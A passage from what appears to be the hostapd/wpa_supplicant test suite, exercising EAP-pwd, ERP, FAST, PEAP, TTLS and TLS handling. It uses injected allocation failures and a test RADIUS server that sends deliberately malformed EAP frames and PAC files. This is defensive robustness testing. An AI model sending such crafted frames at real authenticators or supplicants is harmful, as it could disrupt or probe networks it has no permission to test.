if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_ALLOC_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No allocation failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
for i in range(1, 12):
with alloc_fail(dev[0], i, "eap_pwd_perform_confirm_exchange"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_ALLOC_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No allocation failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
for i in range(1, 5):
with alloc_fail(dev[0], i, "eap_msg_alloc;=eap_pwd_process"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password", fragment_size="50",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
# No password configured
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=52"],
timeout=15)
if ev is None:
raise Exception("EAP-pwd not started")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1,
"hash_nt_password_hash;eap_pwd_perform_commit_exchange"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd-hash",
password_hex="hash:e3718ece8ab74792cbbfffd316d2d19a",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP-Failure reported")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
params = { "ssid": "eap-test2", "wpa": "2", "wpa_key_mgmt": "WPA-EAP",
"rsn_pairwise": "CCMP", "ieee8021x": "1",
"eap_server": "1", "eap_user_file": "auth_serv/eap_user.conf",
"pwd_group": "19", "fragment_size": "40" }
hostapd.add_ap(apdev[1], params)
with alloc_fail(dev[0], 1, "wpabuf_alloc;=eap_pwd_process"):
dev[0].connect("eap-test2", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
for i in range(1, 5):
with fail_test(dev[0], i,
"=crypto_ec_point_to_bin;eap_pwd_perform_confirm_exchange"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd-hash",
password_hex="hash:e3718ece8ab74792cbbfffd316d2d19a",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP-Failure reported")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].dump_monitor()
def test_eap_proto_erp(dev, apdev):
"""ERP protocol tests"""
check_erp_capa(dev[0])
global eap_proto_erp_test_done
eap_proto_erp_test_done = False
def erp_handler(ctx, req):
logger.info("erp_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing type")
return struct.pack(">BBH", EAP_CODE_INITIATE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected type")
return struct.pack(">BBHB", EAP_CODE_INITIATE, ctx['id'], 4 + 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing Reserved field")
return struct.pack(">BBHB", EAP_CODE_INITIATE, ctx['id'], 4 + 1,
EAP_ERP_TYPE_REAUTH_START)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Zero-length TVs/TLVs")
payload = ""
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short TLV")
payload = struct.pack("B", 191)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated TLV")
payload = struct.pack("BB", 191, 1)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Ignored unknown TLV and unknown TV/TLV terminating parsing")
payload = struct.pack("BBB", 191, 0, 192)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: More than one keyName-NAI")
payload = struct.pack("BBBB", EAP_ERP_TLV_KEYNAME_NAI, 0,
EAP_ERP_TLV_KEYNAME_NAI, 0)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short TLV keyName-NAI")
payload = struct.pack("B", EAP_ERP_TLV_KEYNAME_NAI)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated TLV keyName-NAI")
payload = struct.pack("BB", EAP_ERP_TLV_KEYNAME_NAI, 1)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid rRK lifetime TV followed by too short rMSK lifetime TV")
payload = struct.pack(">BLBH", EAP_ERP_TV_RRK_LIFETIME, 0,
EAP_ERP_TV_RMSK_LIFETIME, 0)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing type (Finish)")
return struct.pack(">BBH", EAP_CODE_FINISH, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected type (Finish)")
return struct.pack(">BBHB", EAP_CODE_FINISH, ctx['id'], 4 + 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing fields (Finish)")
return struct.pack(">BBHB", EAP_CODE_FINISH, ctx['id'], 4 + 1,
EAP_ERP_TYPE_REAUTH)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected SEQ (Finish)")
return struct.pack(">BBHBBHB", EAP_CODE_FINISH, ctx['id'],
4 + 1 + 4,
EAP_ERP_TYPE_REAUTH, 0, 0xffff, 0)
logger.info("No more test responses available - test case completed")
global eap_proto_erp_test_done
eap_proto_erp_test_done = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(erp_handler)
try:
hapd = start_ap(apdev[0])
i = 0
while not eap_proto_erp_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="pax.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_fast_errors(dev, apdev):
"""EAP-FAST local error cases"""
check_eap_capa(dev[0], "FAST")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(1, 5):
with alloc_fail(dev[0], i, "eap_fast_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
phase1="fast_provisioning=2",
pac_file="blob://fast_pac_auth",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "wpabuf_alloc;eap_fast_tlv_eap_payload"),
(1, "eap_fast_derive_key;eap_fast_derive_key_auth"),
(1, "eap_msg_alloc;eap_peer_tls_phase2_nak"),
(1, "wpabuf_alloc;eap_fast_tlv_result"),
(1, "wpabuf_alloc;eap_fast_tlv_pac_ack"),
(1, "=eap_peer_tls_derive_session_id;eap_fast_process_crypto_binding"),
(1, "eap_peer_tls_decrypt;eap_fast_decrypt"),
(1, "eap_fast_getKey"),
(1, "eap_fast_get_session_id"),
(1, "eap_fast_get_emsk") ]
for count, func in tests:
dev[0].request("SET blob fast_pac_auth_errors ")
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user@example.com", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
phase1="fast_provisioning=2",
pac_file="blob://fast_pac_auth_errors",
erp="1",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "eap_fast_derive_key;eap_fast_derive_key_provisioning"),
(1, "eap_mschapv2_getKey;eap_fast_get_phase2_key"),
(1, "=eap_fast_use_pac_opaque"),
(1, "eap_fast_copy_buf"),
(1, "=eap_fast_add_pac"),
(1, "=eap_fast_init_pac_data"),
(1, "=eap_fast_write_pac"),
(2, "=eap_fast_write_pac") ]
for count, func in tests:
dev[0].request("SET blob fast_pac_errors ")
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
phase1="fast_provisioning=1",
pac_file="blob://fast_pac_errors",
erp="1",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "eap_fast_get_cmk;eap_fast_process_crypto_binding"),
(1, "eap_fast_derive_eap_msk;eap_fast_process_crypto_binding"),
(1, "eap_fast_derive_eap_emsk;eap_fast_process_crypto_binding") ]
for count, func in tests:
dev[0].request("SET blob fast_pac_auth_errors ")
with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
phase1="fast_provisioning=2",
pac_file="blob://fast_pac_auth_errors",
erp="1",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].request("SET blob fast_pac_errors ")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
phase1="fast_provisioning=1",
pac_file="blob://fast_pac_errors",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
# EAP-FAST: Only EAP-MSCHAPv2 is allowed during unauthenticated
# provisioning; reject phase2 type 6
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
logger.info("Wrong password in Phase 2")
dev[0].request("SET blob fast_pac_errors ")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="wrong password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
phase1="fast_provisioning=1",
pac_file="blob://fast_pac_errors",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ "FOOBAR\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nFOOBAR\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nSTART\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nPAC-Type=12345\nEND\n"
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nPAC-Key=12\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nPAC-Key=1\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nPAC-Key=1q\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nPAC-Opaque=1\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nA-ID=1\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nI-ID=1\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nA-ID-Info=1\nEND\n" ]
for pac in tests:
blob = binascii.hexlify(pac)
dev[0].request("SET blob fast_pac_errors " + blob)
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
phase1="fast_provisioning=2",
pac_file="blob://fast_pac_errors",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ "wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nEND\nSTART\nEND\nSTART\nEND\n" ]
for pac in tests:
blob = binascii.hexlify(pac)
dev[0].request("SET blob fast_pac_errors " + blob)
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
phase1="fast_provisioning=2",
pac_file="blob://fast_pac_errors")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].request("SET blob fast_pac_errors ")
def test_eap_proto_peap_errors(dev, apdev):
"""EAP-PEAP local error cases"""
check_eap_capa(dev[0], "PEAP")
check_eap_capa(dev[0], "MSCHAPV2")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(1, 5):
with alloc_fail(dev[0], i, "eap_peap_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PEAP", anonymous_identity="peap",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "eap_mschapv2_getKey;eap_peap_get_isk;eap_peap_derive_cmk"),
(1, "eap_msg_alloc;eap_tlv_build_result"),
(1, "eap_mschapv2_init;eap_peap_phase2_request"),
(1, "eap_peer_tls_decrypt;eap_peap_decrypt"),
(1, "wpabuf_alloc;=eap_peap_decrypt"),
(1, "eap_peer_tls_encrypt;eap_peap_decrypt"),
(1, "eap_peer_tls_process_helper;eap_peap_process"),
(1, "eap_peer_tls_derive_key;eap_peap_process"),
(1, "eap_peer_tls_derive_session_id;eap_peap_process"),
(1, "eap_peap_getKey"),
(1, "eap_peap_get_session_id") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PEAP", anonymous_identity="peap",
identity="user", password="password",
phase1="peapver=0 crypto_binding=2",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
erp="1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "peap_prfplus;eap_peap_derive_cmk"),
(1, "eap_tlv_add_cryptobinding;eap_tlv_build_result"),
(1, "peap_prfplus;eap_peap_getKey") ]
for count, func in tests:
with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PEAP", anonymous_identity="peap",
identity="user", password="password",
phase1="peapver=0 crypto_binding=2",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
erp="1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1,
"eap_peer_tls_phase2_nak;eap_peap_phase2_request"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PEAP", anonymous_identity="peap",
identity="cert user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_proto_ttls_errors(dev, apdev):
"""EAP-TTLS local error cases"""
check_eap_capa(dev[0], "TTLS")
check_eap_capa(dev[0], "MSCHAPV2")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(1, 5):
with alloc_fail(dev[0], i, "eap_ttls_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="TTLS", anonymous_identity="ttls",
identity="user", password="password",
ca_cert="auth_serv/ca.pem",
phase2="autheap=MSCHAPV2",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "eap_peer_tls_derive_key;eap_ttls_v0_derive_key",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "eap_peer_tls_derive_session_id;eap_ttls_v0_derive_key",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "wpabuf_alloc;eap_ttls_phase2_request_mschapv2",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "eap_peer_tls_derive_key;eap_ttls_phase2_request_mschapv2",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "eap_peer_tls_encrypt;eap_ttls_encrypt_response;eap_ttls_implicit_identity_request",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "eap_peer_tls_decrypt;eap_ttls_decrypt",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "eap_ttls_getKey",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "eap_ttls_get_session_id",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "eap_ttls_get_emsk",
"mschapv2 user@domain", "auth=MSCHAPV2"),
(1, "wpabuf_alloc;eap_ttls_phase2_request_mschap",
"mschap user", "auth=MSCHAP"),
(1, "eap_peer_tls_derive_key;eap_ttls_phase2_request_mschap",
"mschap user", "auth=MSCHAP"),
(1, "wpabuf_alloc;eap_ttls_phase2_request_chap",
"chap user", "auth=CHAP"),
(1, "eap_peer_tls_derive_key;eap_ttls_phase2_request_chap",
"chap user", "auth=CHAP"),
(1, "wpabuf_alloc;eap_ttls_phase2_request_pap",
"pap user", "auth=PAP"),
(1, "wpabuf_alloc;eap_ttls_avp_encapsulate",
"user", "autheap=MSCHAPV2"),
(1, "eap_mschapv2_init;eap_ttls_phase2_request_eap_method",
"user", "autheap=MSCHAPV2"),
(1, "eap_sm_buildIdentity;eap_ttls_phase2_request_eap",
"user", "autheap=MSCHAPV2"),
(1, "eap_ttls_avp_encapsulate;eap_ttls_phase2_request_eap",
"user", "autheap=MSCHAPV2"),
(1, "eap_ttls_parse_attr_eap",
"user", "autheap=MSCHAPV2"),
(1, "eap_peer_tls_encrypt;eap_ttls_encrypt_response;eap_ttls_process_decrypted",
"user", "autheap=MSCHAPV2"),
(1, "eap_ttls_fake_identity_request",
"user", "autheap=MSCHAPV2"),
(1, "eap_msg_alloc;eap_tls_process_output",
"user", "autheap=MSCHAPV2"),
(1, "eap_msg_alloc;eap_peer_tls_build_ack",
"user", "autheap=MSCHAPV2"),
(1, "tls_connection_decrypt;eap_peer_tls_decrypt",
"user", "autheap=MSCHAPV2"),
(1, "eap_peer_tls_phase2_nak;eap_ttls_phase2_request_eap_method",
"cert user", "autheap=MSCHAPV2") ]
for count, func, identity, phase2 in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="TTLS", anonymous_identity="ttls",
identity=identity, password="password",
ca_cert="auth_serv/ca.pem", phase2=phase2,
erp="1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL",
note="Allocation failure not triggered for: %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "os_get_random;eap_ttls_phase2_request_mschapv2"),
(1, "mschapv2_derive_response;eap_ttls_phase2_request_mschapv2") ]
for count, func in tests:
with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="TTLS", anonymous_identity="ttls",
identity="DOMAIN\mschapv2 user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
erp="1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_FAIL",
note="Test failure not triggered for: %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "nt_challenge_response;eap_ttls_phase2_request_mschap") ]
for count, func in tests:
with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="TTLS", anonymous_identity="ttls",
identity="mschap user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAP",
erp="1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_FAIL",
note="Test failure not triggered for: %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_proto_expanded(dev, apdev):
"""EAP protocol tests with expanded header"""
global eap_proto_expanded_test_done
eap_proto_expanded_test_done = False
def expanded_handler(ctx, req):
logger.info("expanded_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge in expanded header")
return struct.pack(">BBHB3BLBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 3,
EAP_TYPE_EXPANDED, 0, 0, 0, EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid expanded EAP length")
return struct.pack(">BBHB3BH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_EXPANDED, 0, 0, 0, EAP_TYPE_MD5)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid expanded frame type")
return struct.pack(">BBHB3BL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_EXPANDED, 0, 0, 1, EAP_TYPE_MD5)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: MSCHAPv2 Challenge")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1 + 16 + 6,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1 + 16 + 6, 16) + 16*'A' + 'foobar'
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid expanded frame type")
return struct.pack(">BBHB3BL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_EXPANDED, 0, 0, 1, EAP_TYPE_MSCHAPV2)
logger.info("No more test responses available - test case completed")
global eap_proto_expanded_test_done
eap_proto_expanded_test_done = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(expanded_handler)
try:
hapd = start_ap(apdev[0])
i = 0
while not eap_proto_expanded_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
if i == 4:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
password="password",
wait_connect=False)
else:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 1 ]:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP failure")
elif i in [ 2, 3 ]:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=5)
if ev is None:
raise Exception("Timeout on EAP proposed method")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP failure")
else:
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_tls(dev, apdev):
"""EAP-TLS protocol tests"""
check_eap_capa(dev[0], "TLS")
global eap_proto_tls_test_done, eap_proto_tls_test_wait
eap_proto_tls_test_done = False
eap_proto_tls_test_wait = False
def tls_handler(ctx, req):
logger.info("tls_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
global eap_proto_tls_test_wait
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too much payload in TLS/Start: TLS Message Length (0 bytes) smaller than this fragment (1 bytes)")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_TLS, 0xa0, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragmented TLS/Start")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_TLS, 0xe0, 2, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too long fragment of TLS/Start: Invalid reassembly state: tls_in_left=2 tls_in_len=0 in_len=0")
